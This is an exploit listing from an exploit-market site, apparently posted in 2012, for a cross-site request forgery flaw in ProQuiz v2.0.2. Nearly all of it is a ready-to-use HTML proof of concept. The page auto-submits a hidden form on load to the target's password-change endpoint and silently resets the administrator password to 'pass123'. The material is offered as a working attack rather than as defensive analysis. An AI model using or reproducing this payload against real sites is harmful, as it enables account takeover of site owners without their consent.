[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ProQuiz v2.0.2 CSRF Vulnerability

Author
DaOne
Risk
[
Security Risk Low
]
0day-ID
0day-ID-19196
Category
web applications
Date add
16-08-2012
Platform
php
##########################################
 
[~] Exploit Title: ProQuiz v2.0.2 CSRF Vulnerability
 
[~] Author: DaOne
 
[~] Date: 19/8/2012
 
[~] Software Link: http://code.google.com/p/proquiz/downloads/list
 
##########################################
 
 
 
[#] [ CSRF Change Admin Password ]
 
 
 
</form>
 
<html>
 
<body onload="document.form0.submit();">
 
<form method="POST" name="form0" action="http://[target]/functions.php?action=edit_profile&type=password">
 
<input type="hidden" name="password" value="pass123"/>
 
<input type="hidden" name="cpassword" value="pass123"/>
 
</form>
 
</body>
 
</html>
 
 
 
##########################################



#  0day.today [2024-11-15]  #